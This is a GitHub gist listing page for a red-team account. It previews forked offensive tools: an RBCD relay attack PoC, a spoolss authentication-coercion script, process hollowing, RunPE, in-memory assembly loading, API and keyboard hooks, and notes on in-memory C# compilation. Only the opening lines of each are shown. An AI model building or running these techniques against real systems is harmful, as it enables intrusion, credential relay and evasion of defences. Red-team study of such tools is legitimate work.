Skip to content

Instantly share code, notes, and snippets.

@RedTeams
RedTeams / rbcd_relay.py
Created August 1, 2019 19:36 — forked from 3xocyte/rbcd_relay.py
poc resource-based constrain delegation relay attack tool
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC
import SimpleHTTPServer
import SocketServer
import base64
import random
import struct
@RedTeams
RedTeams / dementor.py
Created August 1, 2019 19:36 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@RedTeams
RedTeams / TestAssembly.cs
Created August 1, 2019 19:37 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@RedTeams
RedTeams / Server.py
Created August 1, 2019 19:37 — forked from hailangx/Server.py
A simper python http server can handle mime type properly
# -*- coding: utf-8 -*-
#test on python 3.4 ,python of lower version has different module organization.
import http.server
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
PORT = 8080
Handler = http.server.SimpleHTTPRequestHandler
#!/usr/bin/env python3
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import http.server
@RedTeams
RedTeams / Hollowing.cs
Created August 1, 2019 19:39 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <smgorelik@gmail.com>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
@RedTeams
RedTeams / HookFx.cs
Created August 1, 2019 19:42 — forked from NaxAlpha/HookFx.cs
Windows API Hook with C#
using System;
using System.Runtime.InteropServices;
public class FxHook:IDisposable {
const int nBytes = 5;
IntPtr addr;
Protection old;
byte[] src = new byte[5];
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
public static class DynamicCallRunPE
{
private delegate bool CreateProcess_Delegate(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, IntPtr startupInfo, IntPtr processInformation);
private delegate bool ThreadContext_Delegate(IntPtr thread, int[] context);
private delegate bool ProcessMemoryIntPtr_Delegate(IntPtr process, int baseAddress, IntPtr buffer, int bufferSize, int bytesRead);
private delegate bool ProcessMemoryByte_Delegate(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, int bytesRead);
using System;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
/// <summary>
/// Low Level mouse and keyboard hook wrapper
/// Made by BahNahNah
/// </summary>
public class LowLevelHook
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]